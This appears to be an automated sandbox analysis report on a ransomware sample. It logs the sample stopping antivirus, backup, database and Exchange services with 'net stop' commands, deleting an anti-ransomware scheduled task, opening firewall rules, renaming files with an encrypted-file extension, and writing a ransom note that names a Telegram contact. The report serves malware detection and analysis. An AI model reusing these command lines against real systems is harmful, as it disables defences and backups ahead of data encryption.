CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 1240 thread_handle: 0x00000348 process_identifier: 5680 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop EsgShKernel /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000002f4	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5212 thread_handle: 0x00000348 process_identifier: 4576 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop QBIDPService /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6968 thread_handle: 0x00000348 process_identifier: 8200 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop VeeamTransportSvc /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000580	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5412 thread_handle: 0x00000348 process_identifier: 1292 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000574	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 24, 2021, 10:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW March 24, 2021, 10:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (50 out of 229 events)

cmdline	"net.exe" stop SQLAgent$SHAREPOINT /y
cmdline	"net.exe" stop SDRSVC /y
cmdline	"net.exe" stop SamSs /y
cmdline	"net.exe" start SSDPSRV /y
cmdline	"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
cmdline	"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
cmdline	"net.exe" stop Smcinst /y
cmdline	"net.exe" stop vapiendpoint /y
cmdline	"net.exe" stop msftesql$PROD /y
cmdline	"net.exe" stop EPUpdateService /y
cmdline	"net.exe" stop “Sophos AutoUpdate Service” /y
cmdline	"net.exe" stop “Sophos Device Control Service” /y
cmdline	"net.exe" start FDResPub /y
cmdline	"net.exe" stop ntrtscan /y
cmdline	"net.exe" start Dnscache /y
cmdline	"net.exe" stop MSSQLServerADHelper100 /y
cmdline	"net.exe" stop “SQLsafe Filter Service” /y
cmdline	"net.exe" stop DefWatch /y
cmdline	"net.exe" stop MSSQL$PRACTTICEBGC /y
cmdline	"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
cmdline	"net.exe" stop VeeamBackupSvc /y
cmdline	"net.exe" stop MBAMService /y
cmdline	"net.exe" stop MSSQL$ECWDB2 /y
cmdline	"net.exe" stop MSSQL$TPSAMA /y
cmdline	"net.exe" stop QBIDPService /y
cmdline	"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
cmdline	"net.exe" stop McShield /y
cmdline	"net.exe" stop sms_site_sql_backup /y
cmdline	"net.exe" stop sacsvr /y
cmdline	"net.exe" stop QBFCService /y
cmdline	"net.exe" stop McAfeeDLPAgentService /y
cmdline	"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
cmdline	"net.exe" stop mfefire /y
cmdline	"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
cmdline	"net.exe" stop QBCFMonitorService /y
cmdline	"net.exe" stop “Sophos Safestore Service” /y
cmdline	"net.exe" stop swi_update /y
cmdline	"net.exe" stop SQLAgent$SBSMONITORING /y
cmdline	"net.exe" stop MSExchangeIS /y
cmdline	"net.exe" stop MSSQL$BKUPEXEC /y
cmdline	"net.exe" stop “Enterprise Client Service” /y
cmdline	"net.exe" stop SmcService /y
cmdline	"net.exe" stop EhttpSrv /y
cmdline	"net.exe" stop MSSQL$SQL_2008 /y
cmdline	"schtasks" /DELETE /TN "Raccine Rules Updater" /F
cmdline	"net.exe" stop SQLBrowser /y
cmdline	"net.exe" stop audioendpointbuilder /y
cmdline	"net.exe" stop “Veeam Backup Catalog Data Service” /y
cmdline	"net.exe" stop bedbg /y
cmdline	"net.exe" stop “intel(r) proset monitoring service” /y

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Attempts to identify installed AV products by installation directory (10 events)

file	C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt
file	C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt.y9sx7x
file	C:\Windows\Sandboxie.ini
file	C:\Users\All Users\Microsoft\Microsoft Security Client\Support\Application.etl
file	C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppOobe.etl
file	C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetup.log
file	C:\Users\All Users\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Uninstall.log
file	C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetupResult.ini
file	C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetup.etl
file	C:\Users\All Users\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Install.log

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService March 24, 2021, 10:06 a.m.	service_handle: 0x0056ebd8 service_name: AudioSrv control_code: 1	1	1	0
ControlService March 24, 2021, 10:06 a.m.	service_handle: 0x0056e8e0 service_name: AUDIOENDPOINTBUILDER control_code: 1	1	1	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation March 24, 2021, 10:06 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk

Operates on local firewall's policies and settings (2 events)

cmdline	"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
cmdline	"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes

Attempts to detect Cuckoo Sandbox through the presence of a file (2 events)

file	C:\Python27\agent.pyw
file	C:\tmpzdcjvb\analyzer.py

Creates known Hupigon files, registry keys and/or mutexes (1 event)

file	C:\Windows\bootstat.dat

Appends a known multi-family ransomware file extension to files that have been encrypted (50 out of 78 events)

file	C:\Python27\tcl\tcl8.5\encoding\iso2022-kr.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-3.enc
file	C:\Python27\tcl\tcl8.5\encoding\euc-cn.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp857.enc
file	C:\Python27\tcl\tcl8.5\encoding\macIceland.enc
file	C:\Python27\tcl\tcl8.5\encoding\macCyrillic.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-8.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp860.enc
file	C:\Python27\tcl\tcl8.5\encoding\macGreek.enc
file	C:\Python27\tcl\tcl8.5\encoding\ksc5601.enc
file	C:\Python27\tcl\tcl8.5\encoding\gb12345.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1254.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1255.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-2.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp949.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp437.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp775.enc
file	C:\Python27\tcl\tcl8.5\encoding\big5.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp936.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp869.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-5.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-9.enc
file	C:\Python27\tcl\tcl8.5\encoding\ascii.enc
file	C:\Python27\tcl\tcl8.5\encoding\macRoman.enc
file	C:\Python27\tcl\tcl8.5\encoding\gb1988.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-15.enc
file	C:\Python27\tcl\tcl8.5\encoding\ebcdic.enc
file	C:\Python27\tcl\tcl8.5\encoding\macThai.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp865.enc
file	C:\Python27\tcl\tcl8.5\encoding\shiftjis.enc
file	C:\Python27\tcl\tcl8.5\encoding\macCentEuro.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp850.enc
file	C:\Python27\tcl\tcl8.5\encoding\jis0212.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1251.enc
file	C:\Python27\tcl\tcl8.5\encoding\euc-jp.enc
file	C:\Python27\tcl\tcl8.5\encoding\euc-kr.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp863.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso2022-jp.enc
file	C:\Python27\tcl\tcl8.5\encoding\macTurkish.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-1.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp866.enc
file	C:\Python27\tcl\tcl8.5\encoding\macRomania.enc
file	C:\Python27\tcl\tcl8.5\encoding\jis0201.enc
file	C:\Python27\tcl\tcl8.5\encoding\macDingbats.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-4.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1250.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp862.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp864.enc
file	C:\Python27\tcl\tcl8.5\encoding\koi8-r.enc
file	C:\Python27\tcl\tcl8.5\encoding\koi8-u.enc

Creates a known TeslaCrypt/AlphaCrypt ransomware decryption instruction / key file. (2 events)

file	C:\Users\test22\AppData\Local\Temp\RESTORE_FILES_INFO.txt
file	C:\Users\test22\Desktop\RESTORE_FILES_INFO.txt

Writes a potential ransom message to disk (2 events)

Time & API	Arguments	Status	Return	Repeated
NtWriteFile March 24, 2021, 10:06 a.m.	buffer: Your files are secured... If you wanna your files back write in Telegram @Lockthesystem Key Identifier: DTb9jqKkxe+nfV78h2mhzgvUQxsv0vQyz4nJozefKY7zXFKhoiFOTOGwLFBMyFQJOG1chLibc6PTOD49A++y5R8bpLsK/e6on7G9DOl+I6Jkh6/zSCqueBPIaVwfjiQGF9IBLz+FuKZD9itYZJEOZjfVHSbWjkbpjkRxKPQvdhogJ7f2DCxWBcJRUlLpNPXCU7Rwq+dVPZDVxqICy+ANbRwYMufxug9knbMb+Sd1gugxXOzgnAvwO5z1aewQ1nqnUMvyXeB1CewOg3Emb0+qAcPBjoCZd8VEFUW0ei818D7Iuz4oSYdnTbapdF77vx3JanHfaQ3Y5mjmU1K5TMqvlw== offset: 0 file_handle: 0x000003e4 filepath: C:\Users\test22\AppData\Local\Temp\RESTORE_FILES_INFO.txt	1	0	0
NtWriteFile March 24, 2021, 10:06 a.m.	buffer: Your files are secured... If you wanna your files back write in Telegram @Lockthesystem Key Identifier: DTb9jqKkxe+nfV78h2mhzgvUQxsv0vQyz4nJozefKY7zXFKhoiFOTOGwLFBMyFQJOG1chLibc6PTOD49A++y5R8bpLsK/e6on7G9DOl+I6Jkh6/zSCqueBPIaVwfjiQGF9IBLz+FuKZD9itYZJEOZjfVHSbWjkbpjkRxKPQvdhogJ7f2DCxWBcJRUlLpNPXCU7Rwq+dVPZDVxqICy+ANbRwYMufxug9knbMb+Sd1gugxXOzgnAvwO5z1aewQ1nqnUMvyXeB1CewOg3Emb0+qAcPBjoCZd8VEFUW0ei818D7Iuz4oSYdnTbapdF77vx3JanHfaQ3Y5mjmU1K5TMqvlw== Number of files that were processed is: 472 offset: 0 file_handle: 0x000003a8 filepath: C:\Users\test22\Desktop\RESTORE_FILES_INFO.txt	1	0	0

Performs 467 file moves indicative of a ransomware file encryption process (50 out of 467 events)

Time & API	Arguments	Status	Return
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\readme.txt.y9sx7x flags: 2 oldfilepath_r: C:\readme.txt newfilepath: C:\readme.txt.y9sx7x oldfilepath: C:\readme.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Windows\bootstat.dat.y9sx7x flags: 2 oldfilepath_r: C:\Windows\bootstat.dat newfilepath: C:\Windows\bootstat.dat.y9sx7x oldfilepath: C:\Windows\bootstat.dat	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\util\mini-KMS_Activator_v1.1_Office.2010.VL.ENG.txt.y9sx7x flags: 2 oldfilepath_r: C:\util\mini-KMS_Activator_v1.1_Office.2010.VL.ENG.txt newfilepath: C:\util\mini-KMS_Activator_v1.1_Office.2010.VL.ENG.txt.y9sx7x oldfilepath: C:\util\mini-KMS_Activator_v1.1_Office.2010.VL.ENG.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\util\TCPView\Eula.txt.y9sx7x flags: 2 oldfilepath_r: C:\util\TCPView\Eula.txt newfilepath: C:\util\TCPView\Eula.txt.y9sx7x oldfilepath: C:\util\TCPView\Eula.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\util\ProcessMonitor\Eula.txt.y9sx7x flags: 2 oldfilepath_r: C:\util\ProcessMonitor\Eula.txt newfilepath: C:\util\ProcessMonitor\Eula.txt.y9sx7x oldfilepath: C:\util\ProcessMonitor\Eula.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc newfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt newfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.y9sx7x oldfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt newfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc newfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\DiIFqCnigVDeifGD.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\DiIFqCnigVDeifGD.doc newfilepath: C:\Users\test22\Documents\DiIFqCnigVDeifGD.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\DiIFqCnigVDeifGD.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\DkSkuYtBvcj.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\DkSkuYtBvcj.doc newfilepath: C:\Users\test22\Documents\DkSkuYtBvcj.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\DkSkuYtBvcj.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm newfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm newfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf newfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.y9sx7x oldfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\IvVZaQEuSX.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\IvVZaQEuSX.docm newfilepath: C:\Users\test22\Documents\IvVZaQEuSX.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\IvVZaQEuSX.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc newfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt newfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\JYyFOyILPKSZ.ppt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\JYyFOyILPKSZ.ppt newfilepath: C:\Users\test22\Documents\JYyFOyILPKSZ.ppt.y9sx7x oldfilepath: C:\Users\test22\Documents\JYyFOyILPKSZ.ppt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\NKIIOrsnuIi.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\NKIIOrsnuIi.docm newfilepath: C:\Users\test22\Documents\NKIIOrsnuIi.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\NKIIOrsnuIi.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx newfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.y9sx7x oldfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf newfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.y9sx7x oldfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\qDNEXDDorl.pptx.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\qDNEXDDorl.pptx newfilepath: C:\Users\test22\Documents\qDNEXDDorl.pptx.y9sx7x oldfilepath: C:\Users\test22\Documents\qDNEXDDorl.pptx	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\qqjlPSDjqm.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\qqjlPSDjqm.docm newfilepath: C:\Users\test22\Documents\qqjlPSDjqm.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\qqjlPSDjqm.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.cpp.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.cpp newfilepath: C:\Users\test22\Documents\readme.cpp.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.cpp	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.doc newfilepath: C:\Users\test22\Documents\readme.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.hwp.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.hwp newfilepath: C:\Users\test22\Documents\readme.hwp.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.hwp	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.txt newfilepath: C:\Users\test22\Documents\readme.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.xls.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.xls newfilepath: C:\Users\test22\Documents\readme.xls.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.xls	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm newfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\sByekmDWYN.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\SiIydPzVDWm.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\SiIydPzVDWm.txt newfilepath: C:\Users\test22\Documents\SiIydPzVDWm.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\SiIydPzVDWm.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc newfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf newfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.y9sx7x oldfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\ZJxEeTZHFgUo.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\ZJxEeTZHFgUo.txt newfilepath: C:\Users\test22\Documents\ZJxEeTZHFgUo.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\ZJxEeTZHFgUo.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf newfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.y9sx7x oldfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Desktop\readme.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Desktop\readme.txt newfilepath: C:\Users\test22\Desktop\readme.txt.y9sx7x oldfilepath: C:\Users\test22\Desktop\readme.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg newfilepath: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg		0
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html newfilepath: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb newfilepath: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb		0
